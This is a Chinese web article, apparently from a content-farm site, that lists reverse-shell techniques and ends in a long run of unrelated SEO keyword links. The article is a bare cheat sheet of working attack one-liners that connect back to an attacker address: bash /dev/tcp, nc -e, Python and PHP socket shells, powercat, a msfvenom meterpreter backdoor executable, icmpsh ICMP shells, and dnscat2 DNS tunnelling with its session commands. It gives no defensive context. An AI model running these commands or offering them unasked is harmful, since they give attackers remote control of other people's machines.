反弹shell有哪些
发表于:2025-01-19 作者:千家信息网编辑
千家信息网最后更新 2025年01月19日,这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。1.bash反弹bash -i >& /dev/tcp/ip_addr
千家信息网最后更新 2025年01月19日反弹shell有哪些
这篇文章将为大家详细讲解有关反弹shell有哪些,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。
1.bash反弹
bash -i >& /dev/tcp/ip_address/port 0>&1
2.nc反弹
nc -e /bin/sh 192.168.2.130 4444
3.python
import socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "192.168.2.130" , 4444 ))os.dup2(s.fileno(), 0 )os.dup2(s.fileno(), 1 )os.dup2(s.fileno(), 2 )p = subprocess.call([ "/bin/bash" , "-i" ])
4.powercat
Import-Module .\powercat.ps1powercat -c 192.168.2.130 -p 4444 -e cmd.exe
5.msf生成exe后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
6.php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
7.ICMP
关闭icmp响应,不然shell一直跳,恢复是0sysctl -w net.ipv4.icmp_echo_ignore_all=1python icmpsh_m.py 源 目标python icmpsh_m.py 192.168.2.137 192.168.2.135
在windows7运行:
icmpsh.exe -t 192.168.2.137
8.DNS
https://downloads.skullsecurity.org/dnscat2/
这里我们使用dnscat2,这里是下载的,分为windows和linux版本,服务端和客户端。
并且推荐使用vs2008编译
安装
git clone https://github.com/iagox86/dnscat2.gitcd dnscat2cd serversudo gem install bundlerbundle installsudo ruby ./dnscat2.rb
kali
ruby dnscat2.rb --dns host=0.0.0.0,port=53531ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)ruby dnscat2.rb xxx.com
windows7中:
./dnscat --dns server=192.168.2.130,port=53531./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)./dnscat xxx.com
连接成功后
查看记录
选择连接
使用shell
返回选择shell
执行命令
其他命令
quit (退出控制台)kill(中断通道)set(设值,比如设置security=open)windows(列举出所有的通道)window -i (连接某个通道)连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):clear(清屏)delay(修改远程会话超时时间)exec(执行远程机上的程序)shell(得到一个反弹shell)download/upload(两端之间上传下载文件)supend(返回到上一层,等于快捷键ctrl+z)
DNS隧道转发
listen 127.0.0.1:6666 192.168.2.135:80本机的6666就可以访问80端口
关于"反弹shell有哪些"这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。
命令
通道
篇文章
密钥
更多
选择
不错
实用
成功
上传下载
两端
之间
内容
单个
后跟
后门
客户
客户端
快捷键
控制台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
编辑工作比软件开发累
数据库交互测试
服务器哪里可以买到cpu
浪潮服务器配置ip命令
中国互联网科技行业投资
虚拟机怎么启动服务器
异星探险家怎么创建服务器
道县软件开发
免费oracle数据库
网络服务器安全模块
计算机软件开发自学书籍
如何利用网络技术平台革新
学软件开发专升本报哪个专业
凹凸世界服务器维护需要多久
大兴区网络技术信息收费
管理员服务器地址
全国防疫数据库官网
ps5怎么修改dns服务器地址
什么服务器主板是1150的
东西湖国家网络安全永久会址
网络技术和应用技术
配送软件开发价格
如今的网络安全主要有哪几个特点
ftp服务器的配置与管理
福州美美软件开发
三年服务器管理
珠海智能软件开发常见问题
数据库idx排列
安徽网络安全审计硬件生产厂家
天海网络技术